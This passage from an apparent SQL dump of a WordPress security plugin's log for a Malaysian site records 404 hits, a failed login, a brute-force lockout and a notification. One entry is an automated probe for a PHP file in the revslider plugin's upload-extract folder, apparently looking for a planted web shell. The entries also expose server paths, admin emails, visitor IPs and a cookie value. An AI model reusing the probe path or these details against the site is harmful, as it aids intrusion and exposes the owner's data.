s:39:\"https://bintara.com.my/manager/ldskflks\";s:10:\"SCRIPT_URL\";s:17:\"/manager/ldskflks\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYabePE1TXCA7p@bEOfwOAAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569102712.9549\";s:12:\"REQUEST_TIME\";s:10:\"1569102712\";}}','notice','2019-09-21 21:51:54','2019-09-21 21:51:53',30746520,32559168,'https://bintara.com.my/manager/ldskflks',1,0,'119.28.180.62'),(26775,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/manager/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:44:\"https://www.bintara.com.my/manager/index.php\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/manager/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/manager/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYabfjkYtOEVzsOgB0K4OQAAAIo\";s:12:\"REDIRECT_URL\";s:9:\"/manager/\";s:11:\"REMOTE_ADDR\";s:13:\"119.28.180.62\";s:11:\"REMOTE_PORT\";s:5:\"38252\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/manager/\";s:10:\"SCRIPT_URL\";s:9:\"/manager/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYabfjkYtOEVzsOgB0K4OQAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569102718.7405\";s:12:\"REQUEST_TIME\";s:10:\"1569102718\";}}','notice','2019-09-21 21:52:00','2019-09-21 21:51:59',30747128,32561232,'https://bintara.com.my/manager/',1,0,'119.28.180.62'),(26776,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.66 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"23.89.171.134\";s:11:\"REMOTE_PORT\";s:5:\"62452\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYaxRwOuEH7Zn-WPWRdnXAAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569108295.3203\";s:12:\"REQUEST_TIME\";s:10:\"1569108295\";}}','notice','2019-09-21 23:24:57','2019-09-21 23:24:55',31200400,33027344,'https://bintara.com.my/?page_id=18',1,0,'23.89.171.134'),(26777,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:22:\"python-requests/2.22.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYa4GwOuEH7Zn-WPWRdr9AAAAA4\";s:19:\"REDIRECT_SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYa4GwOuEH7Zn-WPWRdr9AAAAA4\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"47.89.208.37\";s:11:\"REMOTE_PORT\";s:5:\"65210\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:82:\"https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:10:\"SCRIPT_URL\";s:60:\"/wp-content/plugins/revslider/temp/update_extract/199877.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYa4GwOuEH7Zn-WPWRdr9AAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569110043.4915\";s:12:\"REQUEST_TIME\";s:10:\"1569110043\";}}','notice','2019-09-21 23:54:06','2019-09-21 23:54:03',31171928,32980128,'https://bintara.com.my/wp-content/plugins/revslider/temp/update_extract/199877.php',1,0,'47.89.208.37'),(26778,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/?page_id=18%26\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:13:\"page_id=18%26\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"55697\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYa7mQOuEH7Zn-WPWRduFAAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569110937.3046\";s:12:\"REQUEST_TIME\";s:10:\"1569110937\";}}','notice','2019-09-22 00:08:59','2019-09-22 00:08:57',30802384,32616736,'https://bintara.com.my/?page_id=18%26',1,0,'94.249.167.197'),(26779,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:38:\"/consultation-implementation-services/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_ACCEPT_CHARSET\";s:36:\"utf-8;q=0.7,iso-8859-1;q=0.2,*;q=0.1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:60:\"https://bintara.com.my/consultation-implementation-services/\";s:19:\"REDIRECT_SCRIPT_URL\";s:38:\"/consultation-implementation-services/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYa9zwOuEH7Zn-WPWRdvbQAAAAM\";s:12:\"REDIRECT_URL\";s:38:\"/consultation-implementation-services/\";s:11:\"REMOTE_ADDR\";s:14:\"216.244.66.228\";s:11:\"REMOTE_PORT\";s:5:\"34426\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:60:\"https://bintara.com.my/consultation-implementation-services/\";s:10:\"SCRIPT_URL\";s:38:\"/consultation-implementation-services/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYa9zwOuEH7Zn-WPWRdvbQAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569111504.0327\";s:12:\"REQUEST_TIME\";s:10:\"1569111504\";}}','notice','2019-09-22 00:18:25','2019-09-22 00:18:24',30747824,32563872,'https://bintara.com.my/consultation-implementation-services/',1,0,'216.244.66.228'),(26780,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/?page_id=18/rss/news/index.xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:29:\"page_id=18/rss/news/index.xml\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"94.249.167.197\";s:11:\"REMOTE_PORT\";s:5:\"64383\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbA6oRu5Nugk8c4xdW6ogAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569112298.1343\";s:12:\"REQUEST_TIME\";s:10:\"1569112298\";}}','notice','2019-09-22 00:31:40','2019-09-22 00:31:38',31204264,33020720,'https://bintara.com.my/?page_id=18/rss/news/index.xml',1,0,'94.249.167.197'),(26781,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=c3f06d8951f7f8aef14d67d49ca37127\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYbA-jkYtOEVzsOgB0K@GgAAAIA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"124.217.235.99\";s:11:\"REMOTE_PORT\";s:5:\"55330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbA-jkYtOEVzsOgB0K@GgAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569112318.2049\";s:12:\"REQUEST_TIME\";s:10:\"1569112318\";}}','notice','2019-09-22 00:31:59','2019-09-22 00:31:58',31161464,32695600,'https://bintara.com.my/wp/wp-login.php',1,0,'124.217.235.99'),(26782,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-22 08:31:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-22 00:31:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 12:31:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-26 04:31:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-22 00:31:59','2019-09-22 00:31:58',31242944,32695600,'https://bintara.com.my/wp/wp-login.php',1,0,'124.217.235.99'),(26783,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-22 00:31:59','2019-09-22 00:31:58',31866360,32695600,'https://bintara.com.my/wp/wp-login.php',1,0,'124.217.235.99'),(26784,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"82.103.70.227\";s:11:\"REMOTE_PORT\";s:5:\"49084\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYbECgOuEH7Zn-WPWRdzlAAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569113098.4649\";s:12:\"REQUEST_TIME\";s:10:\"1569113098\";}}','notice','2019-09-22 00:45:00','2019-09-22 00:44:58',30801888,32613768,'https://bintara.com.my/?page_id=18',1,0,'82.103.70.227'),(26785,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like 